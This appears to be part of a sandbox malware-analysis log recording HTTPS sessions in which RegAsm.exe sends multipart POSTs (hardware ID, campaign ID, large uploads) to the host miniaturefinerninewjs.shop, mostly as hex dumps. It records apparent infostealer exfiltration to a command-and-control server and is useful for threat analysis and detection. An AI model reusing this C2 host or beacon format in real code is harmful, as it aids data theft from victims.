2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 3d 26 cf 4c 16 b1 01 3c 53 34 41 16 00 d0 2a d8 c2 83 fc e3 38 6a 4b 35 e5 69 18 63 fc cf 6c 3e 3e 94 12 fb 46 fe f7 ae f8 2f 01 fb 00 05 e8 0b 2e 11 ae b1 d7 9c 04 d7 f1 1b 4a 2c b4 52 e8 9d 14 a1 cb ae ab 45 42 d4 b2 75 11 d4 e4 25 b2 b4 e8 ee a3 e7 ba 1b 02 7a c5 a6 e7 d2 f8 14 0f 40 f2 a3 27 d3 2b 98 58 c6 71 84 7a 02 6b 80 2f c9 00 04 e7 68 c1 c1 99 6b 36 b0 25 ba 71 49 bd bf d9 2b c2 e7 8a 18 29 95 da 62 58 62 b9 6c 09 a5 86 05 f6 92 b2 17 a8 25 a8 95 4a 57 e1 d5 bc 79 33 da 8b 90 b0 6e c1 6e 5c fb bd 60 fe d6 35 fb e6 b8 ef 36 49 9b 0e 50 aa d7 d2 0d 5e b5 c1 f4 61 83 7e 9c 5e d4 40 cc 33 d8 f1 45 04 6d 2b 65 e0 19 3a 50 6e e3 5a 34 3d 40 17 40 5b ab a5 e4 72 ef f7 55 9b b9 5b 5e bd 80 be e1 55 d5 02 d1 39 8a 74 36 8a 1e bf 39 f7 5e 09 e5 1f f0 71 Data Ascii: =&L<S4A*8jK5icl>>F/.J,REBu%z@'+Xqzk/hk6%qI+)bXbl%JWy3nn\`56IP^a~^@3Em+e:PnZ4=@@[rU[^U9t69^q
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: f6 fc f7 bc 43 90 69 5d 63 7c c4 43 ce af 3d 9e ba 37 c5 69 ef e7 43 05 28 65 af 3e dd 2e 2e 63 2f ff 47 16 de f4 40 da 6a 0c 37 94 d1 30 c1 68 82 fe 7b 5a 31 ce ad 89 74 78 3c 10 14 ca d3 d4 de 3c d0 bd bc 7e ec 1a 08 d9 38 01 2d 99 f9 9a cd 77 f3 74 4f 6e 12 f9 03 2b 9e f6 ef e5 6a c2 78 4e 19 ac cc 46 f2 7f 54 f5 7e 92 14 ab d9 71 e9 78 35 9f 8f f9 cd 06 8e 80 13 22 99 32 56 db 93 b5 fe 99 9f be e8 b9 65 82 13 4e bf 00 4e a2 87 e6 ee ee 59 1e ea 1a 90 2b 35 2d f9 34 38 5a 53 c1 8b f4 1f e2 f3 0e ec 62 b0 26 3a a5 aa f6 26 2b ee 07 bc 91 44 a8 70 1c af cb fb d9 a5 69 b0 57 c0 57 91 5d 9e 88 1a da 13 5c bd 3d 32 92 72 a1 5b 35 32 a2 62 21 ac 8c 21 a0 c7 f5 33 2e 32 5c 54 7a 63 27 36 9f d7 34 ab ed a5 f4 c4 8d b1 15 87 42 bb de 29 d6 ac e1 d7 1d 59 e8 9d Data Ascii: Ci]c\|C=7iC(e>..c/G@j70h{Z1tx<<~8-wtOn+jxNFT~qx5"2VeNNY+5-48ZSb&:&+DpiWW]\=2r[52b!!3.2\Tzc'64B)Y
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: 89 5c 99 a5 47 7a 02 b9 73 01 bc 0f 8b 5d 46 b0 ad b2 d3 3c bc 65 cc 7a 9e 11 7c bb 2e 98 5f bd 82 8b df bc a4 82 1b a5 2b ae 8e 85 be 5d c8 8e 2a 0b bd 7a 12 c7 5e df 16 75 31 9f 66 45 dd 06 8d f3 f0 89 28 ae 41 a1 25 e5 f3 e4 51 21 b9 8b 48 87 bc ba d4 6a 86 22 e6 a7 28 a9 d0 f4 70 93 13 d9 40 43 a1 c1 34 9e a8 33 06 ce 32 85 8f 5d 24 35 56 0c 3d bc 36 fa a3 06 bd 5a 57 76 03 3a 69 4e d0 17 5c cf 4b 6d 73 97 25 3b ee cd 0d e3 69 12 e0 60 8a 37 aa e8 12 19 43 d5 04 6d 0a 85 c5 fc b7 68 f8 94 54 c2 2b d5 d7 db 4a 07 24 08 16 66 19 53 a9 f7 78 32 8a d3 6e 81 12 d7 b3 6c da f6 85 84 d5 cf c9 d3 55 27 20 a9 f0 d7 7e f8 73 b0 9f d7 07 69 fa c8 53 ba 45 88 55 d3 62 66 74 be f9 76 c1 89 66 41 fd ed 2e a0 a3 bd d2 94 45 a3 cd c5 79 2b f9 25 3e 25 c7 84 55 d0 7c Data Ascii: \Gzs]F<ez\|._+]*z^u1fE(A%Q!Hj"(p@C432]$5V=6ZWv:iN\Kms%;i`7CmhT+J$fSx2nlU' ~siSEUbftvfA.Ey+%>%U\|
2024-05-06 05:53:42 UTC	15331	OUT	Data Raw: bd f9 9b 10 0b d7 8e e6 90 6a b3 96 80 5b ac 8f 67 57 72 c7 2a 26 5d 8a 2e cc b8 ba 56 6c 54 ae 06 9f df 7e 7b 7b 46 b1 e5 f8 d0 af 6f b3 9f 5b da 2b b7 72 ad 65 5a f6 b6 47 f9 69 ae d0 7a 52 d2 16 72 ad b7 97 5d 78 7e 97 8a ce 9e d6 19 d6 ca 67 b7 f5 ff 4a 4c 5d 78 43 5b 98 c8 99 7c 2d b0 27 75 f5 bc 6d bd 56 d6 26 89 7a 81 65 e8 6f f9 47 e4 71 e4 c8 9b 32 d7 37 2d fd 73 06 1d d4 ba fd b3 1b 57 fd 38 2f eb b7 d5 1c 82 ca 25 79 4a a7 de a0 bd 9f 08 cb 3d 50 bb 82 0d 2b 8f 34 f6 00 cd 35 0f 1f 12 fb 9c 96 13 49 04 62 3e 71 e2 2b db 6a dc d1 85 fd 35 28 cd 1d ae 0e 7d 84 60 77 86 31 8e cf a5 94 5a cf 69 96 cb a6 ce 9e a1 d9 63 29 5e f5 8f 37 e2 a2 d0 f3 82 b4 69 f4 4b de 37 25 2e 07 3c e6 21 e6 90 9d 45 71 de ce 22 c5 9a 67 b4 7a cf 59 2f 30 14 4b d5 dc 91 Data Ascii: j[gWr*&].VlT~{{Fo[+reZGizRr]x~gJL]xC[\|-'umV&zeoGq27-sW8/%yJ=P+45Ib>q+j5(}`w1Zic)^7iK7%.<!Eq"gzY/0K
2024-05-06 05:53:43 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n9rrbp2liugrd4re4fdvlnelqm; expires=Thu, 29-Aug-2024 23:40:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TvxDMRPBv9zP4Ys%2BA3kGgvJixEHRSiieAdokwU3NEdkJP4cay7QcvqKFG%2FDk6p3%2FA9icIPkwSQsfkJGLgpQlZ92GfNYtQAGTd0CCNTJkdoGXaFy8O9Jlv5WQJBh3YGgQPYN8YYSRWt%2FS6h24ow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6232ae22260-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49787	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:44 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7079 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:44 UTC	7079	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:45 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bkq6olq3usb67006fuu9ve07j7; expires=Thu, 29-Aug-2024 23:40:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fLG6pX0IX1urdZQeC1dTZIiEE5OWfDqlaA%2FONPwb%2BuR6GZJd4S13Cqqcr%2BenkQzupjJm6PN3MdnUxSxD1uaw4tFN3Ynbjq6jNUkw7CTeii7JLn6rFPlU4MBeWpFvHV0ED%2B0tioWA1muEETts1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b62dffe1099a-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49789	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:45 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1325 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:45 UTC	1325	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:45 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e3pp9ir6pjlef2ghjelvge73lj; expires=Thu, 29-Aug-2024 23:40:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrWCuQH9IRLBE%2Boiofw5WiYhv3FUBqFkfTW4Da52gQhj9qGiGEL4cmFhry7NmiepFWgUAWccw2g3RR1qC9T%2FusxnRjJ3ByGFQtRylVcoxYKhjMLAQD7DiiMC5czh86AXAo8IID6W1u0WWfy65A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6338db2875a-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:53:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49790	104.21.30.191	443	5856	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:46 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587264 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 70 03 58 78 e6 10 48 bc 42 04 82 6b fc ec 1c c5 b5 00 93 9e 74 76 ce 71 a0 b3 9e f8 bf ba fa df 4b 2d 70 2f 6e 01 b3 18 10 65 4c cd f6 41 38 ad 20 d8 c1 34 a8 36 42 63 3d 62 59 39 47 3d 77 a0 b8 bb 29 0f 76 86 c3 15 e1 46 17 5a 69 10 f3 b0 54 0f 01 5c 89 4f b1 73 c1 00 73 f9 e5 63 c6 01 11 3b d2 ec 8a 85 e4 54 60 ea 8e ed 42 0d 9a f7 e6 97 c4 a0 95 6f 46 2c a1 0e 29 77 7b 2e 14 3e fc 29 f6 cd e2 84 0a 6f 52 23 86 5a 61 26 ab 3e 08 cb 74 17 22 39 15 6f aa b0 08 93 7f 1e 33 47 49 da aa f3 71 92 e7 d4 d8 0b 73 49 2b f2 15 dd ff a4 9e a1 1f 12 22 93 68 ad 28 2a ff 86 d4 4a a7 1f ac b7 23 f7 bf 20 03 2c ec f5 0b 5a db ea 14 56 6c 51 fe d4 27 94 85 34 90 11 d6 78 c3 8d 6d 0f c5 82 21 fb 13 35 65 2a d7 1a 8d d3 a8 14 37 f4 9b 1d ea 50 7d df db e1 a6 f4 dd 72 79 Data Ascii: pXxHBktvqK-p/neLA8 46Bc=bY9G=w)vFZiT\Ossc;T`BoF,)w{.>)oR#Za&>t"9o3GIqsI+"h(J# ,ZVlQ'4xm!5e7P}ry
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 43 0b 0e 28 a6 11 84 5c 5d 19 b9 6a 6a 0b ea 73 4c 39 f6 f5 f9 8f f3 6d 01 55 d8 84 aa a3 58 d8 f0 59 64 8b 04 5d ec 4f bd c6 2b a7 ae 15 1b 63 ac 21 72 8e 47 d6 b5 33 3f de 15 6f 65 2d 09 c3 96 27 4c 7a 40 a3 16 12 f0 63 10 0c df 88 fe d7 8f f1 62 45 32 6f f8 d1 5b 4d d2 12 64 be e9 13 b5 e0 80 87 c8 91 46 d6 1b 22 91 68 c9 3f 4d b2 d2 d4 ce 2e 9f 99 57 b0 65 c0 74 cc 83 8a 5e 5b aa 1e d4 29 72 93 9f 5a 1d 20 bc 60 bd 68 3c a1 c8 6f a4 c3 af be c7 2c 64 aa d5 89 1b 2f 42 4b de 21 60 62 ab cc 6d b7 b8 5b 41 50 1f 36 6f cd 10 b9 da 0c 42 01 af f6 d7 07 f5 f0 00 77 6c 1f 41 bd a5 04 9f 67 5f 0a 3c b2 ef 50 9a 37 d3 66 2c 9f 07 f3 f1 bb a5 e5 34 63 3e 1b da e6 93 8e 3d 0f da 1c 0c 5e ba fd cd 68 72 a0 7d 9d 51 6c b9 bf e3 1c 4b 12 1d 4c e4 ed ab 65 3c e6 6b Data Ascii: C(\]jjsL9mUXYd]O+c!rG3?oe-'Lz@cbE2o[MdF"h?M.Wet^[)rZ `h<o,d/BK!`bm[AP6oBwlAg_<P7f,4c>=^hr}QlKLe<k
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 02 58 74 63 2e 41 14 fd 76 7f 31 36 3e 64 ef fe e2 d7 32 db 4f c8 d8 01 85 f8 78 c5 b1 fa 2f 34 6f 90 5b c9 41 03 d9 d5 e1 7c 3d db b7 92 a0 c3 38 8b eb 03 cb 4d 81 bf 58 92 ff 36 40 39 3b e6 2c 00 1c 18 cd 33 51 09 8c 18 95 09 c9 e5 c6 6f 78 33 75 a7 be 58 21 1e 5a 60 06 86 0f 9e 39 8b 6f 4e bc 26 0a f6 28 6c df f7 f1 03 fe 6e 9b a1 87 d5 cd 49 01 6e f1 f1 86 1e 4a 10 10 34 db 6d c4 96 41 9a ec 59 6a ef 24 b4 82 82 2c b6 e9 2e f9 61 f5 6d 34 33 bb 64 e6 39 14 f6 bb d5 3e 41 bf 05 5f 0d 07 51 e4 6b b6 f7 9f 72 fe 6e b7 df 7f ed b1 3e aa 51 e5 79 94 74 62 9a 81 13 0c 72 02 f6 09 16 18 7a 2a 0b 75 2a 46 6f 1d d7 16 2b 71 eb eb 55 46 84 06 09 3c b4 6d dc 9b 7b 49 b3 21 59 79 e6 89 dc a3 dd e0 54 57 b6 5d 6d c0 a3 8b 89 3e 2f cd 0e 2c 48 83 de 87 9e 26 88 99 Data Ascii: Xtc.Av16>d2Ox/4o[A\|=8MX6@9;,3Qox3uX!Z`9oN&(lnInJ4mAYj$,.am43d9>A_Qkrn>QytbrzuFo+qUF<m{I!YyTW]m>/,H&
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 47 96 fa 9d dd ca da 12 1a 0d a3 96 1f f1 71 c7 68 2e be c5 65 92 a6 7b 3f ab 69 e4 58 b0 fd 4a af e9 8c bc a3 e3 95 e5 c5 17 be 6d ab e9 8c b6 87 56 77 7b 93 9f 7f 34 fa 59 ce 43 4a bb 6d be 58 fd 41 dd da 9b 39 77 22 cb a2 6a 82 55 7b 77 97 34 85 05 df 52 1f ce 49 59 97 52 f8 60 ad f0 dc 15 c3 f4 7b 01 b1 91 75 21 e0 7b 38 f4 fe 95 75 04 6d 79 a1 4b 0b 3f 2b bb fd c3 f6 97 0e 3a 1a c3 b3 f8 56 b1 b8 a6 ab 96 8c c6 5b 9e ba 52 3f bd 87 cb 14 a3 93 3e 48 dd 3d f8 f8 08 bb c8 1f 76 26 34 d7 02 e1 23 0c 0a e0 37 8c 54 41 af 54 fa 31 63 77 61 bb 43 00 f2 3a 20 2e f2 9d 56 3b 84 06 74 f1 ad d2 c4 64 c2 15 c9 87 de 30 80 8a 37 27 12 2b 72 fd 72 d1 31 25 72 b8 00 c5 69 ae c0 de 4e d4 ac 9c 4f ff 61 1f f1 0e 10 ff 72 c5 5f fe a0 ea 20 6a ef ee c0 9e 21 a1 4f c8 Data Ascii: Gqh.e{?iXJmVw{4YCJmXA9w"jU{w4RIYR`{u!{8umyK?+:V[R?>H=v&4#7TAT1cwaC: .V;td07'+rr1%riNOar_ j!O
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: aa 5a 28 5c e9 fc 06 52 8b f1 ce 22 dd f5 21 f2 5e 4b e7 0d e9 d7 af d6 db 8a 82 e6 16 5e bd 0a 2c c7 0a 2b 2f 18 7e dd 36 82 a0 56 08 22 0b da 74 58 88 67 b7 dc 55 43 86 0d a2 79 37 9d 71 5f f3 c4 9c 05 5a 8d ab f5 58 67 49 f8 3d a4 d5 02 a5 a3 5f 7c 61 38 c8 91 f7 5e 9f 20 5d 35 9a 3d a9 47 bf 90 8f 1b b2 bd f9 dc 76 e7 b0 34 23 19 4d bb 9b fb 81 34 1a 5a 54 0d 35 4a a8 31 6c 67 1a fd f4 f0 a7 ba 3a 8b 9f 05 e4 e1 8f 4a c3 a2 3c ff 95 e4 b6 1a d4 90 51 14 d8 e0 77 86 08 fe e1 8b 13 b9 f5 01 17 39 88 28 e5 05 bf 44 1b 99 a1 35 b1 cd 33 26 9f e4 a0 c4 1a dd 56 f6 59 7a 06 21 66 09 ad cc 3a db 95 5a b6 75 c5 b5 c6 3b a6 18 af f1 98 2f 83 f8 8a 1e 0f 39 ca 06 95 5f 38 21 d1 1f 20 8c 7b eb 17 bb b4 55 13 45 79 f1 3d c3 63 0b 3f 3f be a1 48 47 cf 87 78 b6 94 Data Ascii: Z(\R"!^K^,+/~6V"tXgUCy7q_ZXgI=_\|a8^ ]5=Gv4#M4ZT5J1lg:J<Qw9(D53&VYz!f:Zu;/9_8! {UEy=c??HGx
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 1e 93 67 26 8b d8 00 9e 29 9a 20 0b 00 68 15 6c e1 41 fe 71 1c b5 a5 9a f2 34 8c 31 fe 67 36 1f 1f 4a 89 7d 23 ff 7b 57 fc 97 80 7d 80 02 f4 05 97 08 d7 d8 6b 4e 82 eb f8 0d 25 16 5a 29 f4 4e 8a d0 65 d7 d5 22 21 6a d9 ba 08 6a f2 12 59 5a 74 f7 d1 73 dd 0d 01 bd 62 d3 73 69 7c 8a 07 20 f9 d1 93 e9 15 4c 2c e3 38 42 3d 81 35 c0 97 64 00 82 73 b4 e0 e0 cc 35 1b d8 12 dd b8 a4 de df ec 15 e1 73 45 8c 94 4a 6d 31 2c b1 5c b6 84 52 c3 02 7b 49 d9 0b d4 12 d4 4a a5 ab f0 6a de bc 19 ed 45 48 58 b7 60 37 ae fd 5e 30 7f eb 9a 7d 73 dc 77 9b a4 4d 07 28 d5 6b e9 06 af da 60 fa b0 41 3f 4e 2f 6a 20 e6 19 ec f8 22 82 b6 95 32 f0 0c 1d 28 b7 71 2d 9a 1e a0 0b a0 ad d5 52 72 b9 f7 fb aa cd dc 2d af 5e 40 df f0 aa 6a 81 e8 1c 45 3a 1b 45 8f df 9c 7b af 84 f2 0f f8 b8 Data Ascii: g&) hlAq41g6J}#{W}kN%Z)Ne"!jjYZtsbsi\| L,8B=5ds5sEJm1,\R{IJjEHX`7^0}swM(k`A?N/j "2(q-Rr-^@jE:E{
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 7b fe 7b de 21 c8 b4 ae 31 3e e2 21 e7 d7 1e 4f dd 9b e2 b4 f7 f3 a1 02 94 b2 57 9f 6e 17 97 b1 97 ff 23 0b 6f 7a 20 6d 35 86 1b ca 68 98 60 34 41 ff 3d ad 18 e7 d6 44 3a 3c 1e 08 0a e5 69 6a 6f 1e e8 5e 5e 3f 76 0d 84 6c 9c 80 96 cc 7c cd e6 bb 79 ba 27 37 89 fc 81 15 4f fb f7 72 35 61 3c a7 0c 56 66 23 f9 3f aa 7a 3f 49 8a d5 ec b8 74 bc 9a cf c7 fc 66 03 47 c0 09 91 4c 19 ab ed c9 5a ff cc 4f 5f f4 dc 32 c1 09 a7 5f 00 27 d1 43 73 77 f7 2c 0f 75 0d c8 95 9a 96 7c 1a 1c ad a9 e0 45 fa 0f f1 79 07 76 31 58 13 9d 52 55 7b 93 15 f7 03 de 48 22 54 38 8e d7 e5 fd ec d2 34 d8 2b e0 ab c8 2e 4f 44 0d ed 09 ae de 1e 19 49 b9 d0 ad 1a 19 51 b1 10 56 c6 10 d0 e3 fa 19 17 19 2e 2a bd b1 13 9b cf 6b 9a d5 f6 52 7a e2 c6 d8 8a 43 a1 5d ef 14 6b d6 f0 eb 8e 2c f4 4e Data Ascii: {{!1>!OWn#oz m5h`4A=D:<ijo^^?vl\|y'7Or5a<Vf#?z?ItfGLZO_2_'Csw,u\|Eyv1XRU{H"T84+.ODIQV.*kRzC]k,N
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: 44 ae cc d2 23 3d 81 dc b9 00 de 87 c5 2e 23 d8 56 d9 69 1e de 32 66 3d cf 08 be 5d 17 cc af 5e c1 c5 6f 5e 52 c1 8d d2 15 57 c7 42 df 2e 64 47 95 85 5e 3d 89 63 af 6f 8b ba 98 4f b3 a2 6e 83 c6 79 f8 44 14 d7 a0 d0 92 f2 79 f2 a8 90 dc 45 a4 43 5e 5d 6a 35 43 11 f3 53 94 54 68 7a b8 c9 89 6c a0 a1 d0 60 1a 4f d4 19 03 67 99 c2 c7 2e 92 1a 2b 86 1e 5e 1b fd 51 83 5e ad 2b bb 01 9d 34 27 e8 0b ae e7 a5 b6 b9 cb 92 1d f7 e6 86 f1 34 09 70 30 c5 1b 55 74 89 8c a1 6a 82 36 85 c2 62 fe 5b 34 7c 4a 2a e1 95 ea eb 6d a5 03 12 04 0b b3 8c a9 d4 7b 3c 19 c5 69 b7 40 89 eb 59 36 6d fb 42 c2 ea e7 e4 e9 aa 13 90 54 f8 6b 3f fc 39 d8 cf eb 83 34 7d e4 29 dd 22 c4 aa 69 31 33 3a df 7c bb e0 44 b3 a0 fe 76 17 d0 d1 5e 69 ca a2 d1 e6 e2 bc 95 fc 12 9f 92 63 c2 2a 68 3e Data Ascii: D#=.#Vi2f=]^o^RWB.dG^=coOnyDyEC^]j5CSThzl`Og.+^Q^+4'4p0Utj6b[4\|Jm{<i@Y6mBTk?94})"i13:\|Dv^ich>
2024-05-06 05:53:46 UTC	15331	OUT	Data Raw: de fc 4d 88 85 6b 47 73 48 b5 59 4b c0 2d d6 c7 b3 2b b9 63 15 93 2e 45 17 66 5c 5d 2b 36 2a 57 83 cf 6f bf bd 3d a3 d8 72 7c e8 d7 b7 d9 cf 2d ed 95 5b b9 d6 32 2d 7b db a3 fc 34 57 68 3d 29 69 0b b9 d6 db cb 2e 3c bf 4b 45 67 4f eb 0c 6b e5 b3 db fa 7f 25 a6 2e bc a1 2d 4c e4 4c be 16 d8 93 ba 7a de b6 5e 2b 6b 93 44 bd c0 32 f4 b7 fc 23 f2 38 72 e4 4d 99 eb 9b 96 fe 39 83 0e 6a dd fe d9 8d ab 7e 9c 97 f5 db 6a 0e 41 e5 92 3c a5 53 6f d0 de 4f 84 e5 1e a8 5d c1 86 95 47 1a 7b 80 e6 9a 87 0f 89 7d 4e cb 89 24 02 31 9f 38 f1 95 6d 35 ee e8 c2 fe 1a 94 e6 0e 57 87 3e 42 b0 3b c3 18 c7 e7 52 4a ad e7 34 cb 65 53 67 cf d0 ec b1 14 af fa c7 1b 71 51 e8 79 41 da 34 fa 25 ef 9b 12 97 03 1e f3 10 73 c8 ce a2 38 6f 67 91 62 cd 33 5a bd e7 ac 17 18 8a a5 6a ee 48 Data Ascii: MkGsHYK-+c.Ef\]+6*Wo=r\|-[2-{4Wh=)i.<KEgOk%.-LLz^+kD2#8rM9j~jA<SoO]G{}N$18m5W>B;RJ4eSgqQyA4%s8ogb3ZjH
